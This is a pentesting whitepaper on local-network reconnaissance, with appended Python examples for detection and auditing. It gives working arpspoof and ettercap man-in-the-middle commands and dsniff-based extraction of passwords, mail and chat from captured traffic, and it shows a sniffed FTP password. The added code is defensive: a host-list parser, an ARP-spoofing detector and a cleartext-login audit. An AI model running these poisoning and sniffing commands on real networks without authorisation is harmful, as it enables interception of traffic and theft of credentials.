Pentesting In Local Networks Part 1

Posted Jul 1, 2011
Authored by ph0x90bic

Whitepaper called Pentesting in Local Networks Part 1. It discusses performing recon, ARP poisoning, traffic analysis techniques, and more.

tags | paper, local
SHA-256 | 61bd8550d6d7da3a35747d2f5abbe23c40f3b034a054bb63345a6aab75a7e160

---------------------------------------
| Team ph0x90bic proudly presents |
| Pentesting in Local Networks Part 1 |
| Reconnaissance and ARP Poisoning |
---------------------------------------

INTRODUCTION

This paper describes standard reconnaissance, ARP poisoning and traffic
analysis techniques with dsniff, ettercap and netdiscover on local networks.
All the tools needed come preinstalled on NodeZero Linux.

Tools needed:

* netdiscover (Search for hosts on local network)
* tcpdump/tshark (Sniff network traffic)
* dsniff/ettercap (Launch ARP-Poisoning and analyze pcap files)

---

CHECK LOCAL NETWORK CONFIGURATION

First check your own network configuration to learn the address, netmask,
gateway and interface of the local network you are connected to.

# sudo ifconfig

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:18308 errors:0 dropped:0 overruns:0 frame:0
TX packets:18308 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:9599453 (9.5 MB) TX bytes:9599453 (9.5 MB)

wlan0 Link encap:Ethernet HWaddr 90:4c:e5:a5:9c:2b
inet addr:10.0.0.1 Bcast:10.0.0.255 Mask:255.255.255.0
inet6 addr: fe80::924c:e5ff:fea5:9c2b/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:32320 errors:0 dropped:0 overruns:0 frame:0
TX packets:30280 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:21141126 (21.1 MB) TX bytes:16626291 (16.6 MB)

# sudo route -n

Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
10.0.0.0 0.0.0.0 255.255.255.0 U 2 0 0 wlan0
169.254.0.0 0.0.0.0 255.255.0.0 U 1000 0 0 wlan0
0.0.0.0 10.0.0.254 0.0.0.0 UG 0 0 0 wlan0

RESULTS

Ownipv4: 10.0.0.1
Ownipv6: fe80::924c:e5ff:fea5:9c2b/64
Gateway: 10.0.0.254
Netmask: 255.255.255.0
Network: 10.0.0.0/24
Interface: wlan0

---

COLLECT PASSIVE INFORMATION

You can collect information without sending any traffic yourself by sniffing
the network with tshark or tcpdump. netdiscover in passive mode (-p) lists the
live hosts in real time and shows the MAC vendor of each one.

# sudo tshark -n -i wlan0 -w netlog.pcap not src 10.0.0.1 &
# sudo tshark -n -i wlan0 not src 10.0.0.1

# sudo tcpdump -n -i wlan0 -w netlog.pcap not src 10.0.0.1 &
# sudo tcpdump -n -i wlan0 not src 10.0.0.1

# sudo netdiscover -p -i wlan0

--- SNIPPED TCPDUMP OUTPUT START ---
...
16:43:46.886878 ARP, Request who-has 10.0.0.254 tell 10.0.0.254, length 28
16:43:46.888905 ARP, Request who-has 10.0.0.2 tell 10.0.0.254, length 28
16:43:46.889431 ARP, Request who-has 10.0.0.3 tell 10.0.0.254, length 28
16:43:46.891183 ARP, Request who-has 10.0.0.4 tell 10.0.0.254, length 28
...
--- SNIPPED TCPDUMP OUTPUT END ---

--- NETDISCOVER OUTPUT START ---
Currently scanning: (passive) | Screen View: Unique Hosts

174 Captured ARP Req/Rep packets, from 5 hosts. Total size: 7344
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor
-----------------------------------------------------------------------------
10.0.0.254 00:1f:9f:e9:1e:a6 157 6594 Thomson Telecom Belgium
10.0.0.3 00:24:21:ba:04:bd 02 120 Unknown vendor
10.0.0.2 00:18:de:60:9f:7d 02 084 Intel Corporation
0.0.0.0 00:18:de:60:9f:7d 03 126 Intel Corporation
10.0.0.4 00:90:4b:94:2d:0d 10 420 GemTek Technology Co., Ltd.
--- NETDISCOVER OUTPUT END ---

RESULTS

Hosts: 10.0.0.2 (00:18:de:60:9f:7d)
10.0.0.3 (00:24:21:ba:04:bd)
10.0.0.4 (00:90:4b:94:2d:0d)

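The netdiscover table above has five rows but the RESULTS block lists only three hosts: the gateway is left out, and the 0.0.0.0 row is an ARP probe (a host that has no address yet, RFC 5227) from the same MAC as 10.0.0.2, not a fifth machine. The following added example, which is not part of the paper, parses the table and derives that host list automatically; the sample text is the paper's own output embedded as a constructed string, and the gateway address is passed in by hand.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed sample in the layout netdiscover prints; the rows are copied from the
# paper's output above so the result can be compared with its RESULTS block.
NETDISCOVER_OUTPUT = """\
Currently scanning: (passive) | Screen View: Unique Hosts

174 Captured ARP Req/Rep packets, from 5 hosts. Total size: 7344
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor
-----------------------------------------------------------------------------
10.0.0.254 00:1f:9f:e9:1e:a6 157 6594 Thomson Telecom Belgium
10.0.0.3 00:24:21:ba:04:bd 02 120 Unknown vendor
10.0.0.2 00:18:de:60:9f:7d 02 084 Intel Corporation
0.0.0.0 00:18:de:60:9f:7d 03 126 Intel Corporation
10.0.0.4 00:90:4b:94:2d:0d 10 420 GemTek Technology Co., Ltd.
"""

# One host row: IP, MAC, packet count, byte length, free-text vendor.
ROW_RE = re.compile(
    r"^(\d+\.\d+\.\d+\.\d+)\s+([0-9a-f]{2}(?::[0-9a-f]{2}){5})\s+(\d+)\s+(\d+)\s+(.*)$",
    re.IGNORECASE,
)


def parse_netdiscover(text):
    """Turn the text table into a list of dicts; header and separator lines are skipped."""
    hosts = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            ip, mac, count, length, vendor = m.groups()
            hosts.append({"ip": ip, "mac": mac.lower(), "count": int(count),
                          "len": int(length), "vendor": vendor.strip()})
    return hosts


def live_hosts(hosts, gateway):
    """The list the paper builds by hand: every address except the gateway and
    0.0.0.0 (an ARP probe from a host that has no address yet, RFC 5227)."""
    return sorted(((h["ip"], h["mac"]) for h in hosts if h["ip"] not in (gateway, "0.0.0.0")),
                  key=lambda pair: ipaddress.ip_address(pair[0]))


def probing_hosts(hosts):
    """Map each MAC seen probing with 0.0.0.0 to the real addresses it also answers for,
    so the probe row is not counted as an extra host."""
    by_mac = defaultdict(set)
    for h in hosts:
        by_mac[h["mac"]].add(h["ip"])
    return {mac: sorted(ips - {"0.0.0.0"}) for mac, ips in by_mac.items() if "0.0.0.0" in ips}


if __name__ == "__main__":
    parsed = parse_netdiscover(NETDISCOVER_OUTPUT)
    for ip, mac in live_hosts(parsed, "10.0.0.254"):
        print(f"{ip:<12} {mac}")
    print("probing:", probing_hosts(parsed))
```

The same parser can be fed a later snapshot of the table; a MAC that suddenly appears under more than one real address, or an address that appears under two MACs, is the kind of change worth checking before trusting the host list.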
---

ARPSPOOFING ALL HOSTS

You can arpspoof all hosts on the local network. This is dangerous in large
networks, because every host's traffic is then relayed through your machine and
the extra load degrades network performance. In small networks spoofing all
hosts is possible without any problems.

# sudo tcpdump -n -i wlan0 -w landump.pcap not host 10.0.0.1
# sudo tshark -n -i wlan0 -w landump.pcap not host 10.0.0.1

# sudo arpspoof -i wlan0 10.0.0.254
# sudo ettercap -TQM arp:remote -i wlan0 // /10.0.0.254/

RESULTS

Sniffed traffic from all hosts on network as pcap file in landump.pcap

---

ARPSPOOF SPECIFIC HOST

On larger networks use this attack to arpspoof a specific host only.

# sudo tcpdump -n -i wlan0 -w landump.pcap not host 10.0.0.1
# sudo tshark -n -i wlan0 -w landump.pcap not host 10.0.0.1

# sudo arpspoof -i wlan0 -t 10.0.0.2 10.0.0.254
# sudo ettercap -TQM arp:remote -i wlan0 /10.0.0.2/ /10.0.0.254/

RESULTS

Sniffed traffic from 10.0.0.2 only as pcap file in landump.pcap

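Both arpspoof variants above work the same way on the wire: the attacking host sends ARP replies that nobody asked for, every few seconds, claiming the gateway's address with its own MAC. That is also what makes the attack visible to anyone watching the tcpdump feed started earlier. The following added detector, which is not part of the paper and not a dsniff or ettercap tool, reads ARP lines in tcpdump's `-n` output format and raises an alert for a reply with no recent matching request and for a reply that contradicts the first MAC learned for that address. The sample lines are constructed; the gateway MAC 00:1f:9f:e9:1e:a6 and the wlan0 MAC 90:4c:e5:a5:9c:2b are taken from the paper's own netdiscover and ifconfig output, with the latter playing the spoofing host.

```python
import re

# Constructed ARP lines in the format tcpdump prints with -n (first line copied from
# the paper's snippet). 10.0.0.254 / 00:1f:9f:e9:1e:a6 is the gateway from the paper's
# netdiscover output; 90:4c:e5:a5:9c:2b is the wlan0 address from its ifconfig output,
# here playing the host that starts sending forged replies for the gateway.
SAMPLE_LINES = [
    "16:43:46.886878 ARP, Request who-has 10.0.0.254 tell 10.0.0.254, length 28",
    "16:43:50.120001 ARP, Request who-has 10.0.0.254 tell 10.0.0.2, length 28",
    "16:43:50.120412 ARP, Reply 10.0.0.254 is-at 00:1f:9f:e9:1e:a6, length 28",
    "16:43:51.004000 ARP, Request who-has 10.0.0.2 tell 10.0.0.254, length 28",
    "16:43:51.004300 ARP, Reply 10.0.0.2 is-at 00:18:de:60:9f:7d, length 28",
    "16:45:10.200000 ARP, Reply 10.0.0.254 is-at 90:4c:e5:a5:9c:2b, length 28",
    "16:45:12.200000 ARP, Reply 10.0.0.254 is-at 90:4c:e5:a5:9c:2b, length 28",
]

ARP_RE = re.compile(
    r"^(?P<ts>\d{2}:\d{2}:\d{2}\.\d+) ARP, "
    r"(?:Request who-has (?P<req_ip>\S+) tell (?P<asker>\S+)"
    r"|Reply (?P<rep_ip>\S+) is-at (?P<mac>[0-9a-fA-F:]{17})), length \d+$"
)


def _seconds(ts):
    """Convert hh:mm:ss.frac into seconds since midnight (good enough for one capture)."""
    h, m, s = ts.split(":")
    return int(h) * 3600 + int(m) * 60 + float(s)


class ArpMonitor:
    """Trust-on-first-use ARP watcher: remembers the first MAC seen for each IP and
    flags (a) replies nobody asked for recently and (b) replies that contradict the
    remembered mapping. A poisoning tool produces both every few seconds."""

    def __init__(self, unsolicited_window=5.0):
        self.window = unsolicited_window   # seconds a request stays "open"
        self.table = {}                    # ip -> first MAC that answered for it
        self.last_request = {}             # ip -> timestamp of the latest request for it
        self.alerts = []

    def feed(self, line):
        m = ARP_RE.match(line.strip())
        if not m:
            return []                      # not an ARP line, or one this parser skips
        t = _seconds(m["ts"])
        if m["req_ip"]:
            self.last_request[m["req_ip"]] = t
            return []
        ip, mac = m["rep_ip"], m["mac"].lower()
        new = []
        asked = self.last_request.get(ip)
        if asked is None or t - asked > self.window:
            new.append(("unsolicited-reply", ip, mac, m["ts"]))
        known = self.table.setdefault(ip, mac)   # first answer wins
        if known != mac:
            new.append(("mapping-conflict", ip, f"{known} vs {mac}", m["ts"]))
        self.alerts.extend(new)
        return new


def scan(lines, window=5.0):
    """Run the monitor over a list of tcpdump lines and return every alert raised."""
    mon = ArpMonitor(window)
    for line in lines:
        mon.feed(line)
    return mon.alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_LINES):
        print(*alert)
```

On the constructed capture the two benign replies pass silently and each forged reply raises both alerts. Without `-e` tcpdump does not print the link-layer destination, so this version cannot distinguish a unicast reply from a broadcast one; the first-answer-wins table also means a genuine gateway hardware replacement will show up as a conflict until the monitor is restarted, which is the correct behaviour for a tripwire.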
---

DSNIFF

You can analyze pcap files easily with the dsniff tools, or manually with
strings, grep or similar tools.

# sudo dsniff -n -p landump.pcap (Passwords)
# sudo urlsnarf -n -p landump.pcap (HTTP Requests)
# sudo filesnarf -n -p landump.pcap (NFS Files)
# sudo mailsnarf -n -p landump.pcap (SMTP/POP mails)
# sudo msgsnarf -n -p landump.pcap (Chat messages)
# sudo strings landump.pcap | grep -i 'yourstring' (Manual analysis)

--- DSNIFF OUTPUT START ---
03/18/11 20:48:12 tcp 10.0.0.2.50222 -> openbsd.sunsite.ualberta.ca.21 (ftp)
USER anonymous
PASS SUPERGEHEIM
--- DSNIFF OUTPUT END ---

RESULTS

Cleartext information in sniffed pcap traffic.

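The dsniff output above is the reason the attack matters: FTP sends the password in the clear, and the same is true of HTTP Basic authentication, POP3 and IMAP LOGIN. The following added example, not part of the paper and not a dsniff tool, is the audit a network owner would run over reassembled client-to-server payloads from a capture like landump.pcap to find every service that still accepts cleartext logins, so those services can be moved to TLS. It generalizes past the paper's FTP case to the other three protocols, and it deliberately records only the user name and the length of the secret, never the secret itself. The sample streams are constructed (the FTP login is the one shown in the paper; the other sessions and host names are invented), and the stream reassembly that would produce them is assumed to have been done already.

```python
import base64
import re

# Constructed client->server payloads keyed by destination port, the kind of text a
# stream reassembler (or `strings`) yields from landump.pcap. The FTP login is the one
# from the paper's dsniff output; the other sessions and host names are invented.
SAMPLE_STREAMS = [
    (21, "USER anonymous\r\nPASS SUPERGEHEIM\r\nLIST\r\n"),
    (80, "GET /admin/ HTTP/1.1\r\nHost: intranet.example.test\r\n"
         "Authorization: Basic YWRtaW46aHVudGVyMg==\r\n\r\n"),
    (110, "USER bob\r\nPASS s3cret\r\nSTAT\r\n"),
    (143, "a001 LOGIN alice wonderland\r\n"),
    (443, "\x16\x03\x01\x00\xa5..."),   # TLS: nothing readable, must yield no finding
]

# Cleartext authentication protocols this audit understands, by server port.
PORT_PROTOCOL = {21: "ftp", 80: "http", 110: "pop3", 143: "imap"}
BASIC_RE = re.compile(r"^Authorization:\s*Basic\s+(\S+)", re.IGNORECASE)
IMAP_LOGIN_RE = re.compile(r"^\S+\s+LOGIN\s+(\S+)\s+(\S+)", re.IGNORECASE)


def _finding(protocol, user, secret):
    # The secret itself is never stored; its length is enough to prove it was on the wire.
    return {"protocol": protocol, "user": user, "secret_len": len(secret)}


def audit_stream(dst_port, payload):
    """Return one finding per cleartext login found in a single client->server stream."""
    protocol = PORT_PROTOCOL.get(dst_port)
    findings = []
    if protocol is None:
        return findings
    user = None
    for raw in payload.splitlines():
        line = raw.strip()
        if protocol in ("ftp", "pop3"):
            # Both protocols use the same two-step USER / PASS exchange.
            if line[:5].upper() == "USER ":
                user = line[5:]
            elif line[:5].upper() == "PASS ":
                findings.append(_finding(protocol, user, line[5:]))
        elif protocol == "http":
            m = BASIC_RE.match(line)
            if m:
                try:
                    decoded = base64.b64decode(m.group(1), validate=True).decode("latin-1")
                except ValueError:          # binascii.Error is a ValueError subclass
                    continue                # malformed header, not a credential
                u, _, p = decoded.partition(":")
                findings.append(_finding(protocol, u, p))
        elif protocol == "imap":
            m = IMAP_LOGIN_RE.match(line)
            if m:
                findings.append(_finding(protocol, m.group(1), m.group(2)))
    return findings


def audit(streams):
    """Audit every (port, payload) pair and collect the findings."""
    out = []
    for port, payload in streams:
        out.extend(audit_stream(port, payload))
    return out


if __name__ == "__main__":
    for f in audit(SAMPLE_STREAMS):
        print(f"{f['protocol']:<5} user={f['user']!r} secret_len={f['secret_len']}")
```

Attributing a stream to a protocol by destination port is an assumption that holds for the paper's FTP example and for standard server configurations; a service on a non-standard port needs the port map extended. The TLS entry is there to show the negative case: encrypted sessions produce nothing, which is exactly the state the audit is meant to drive the network toward.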
---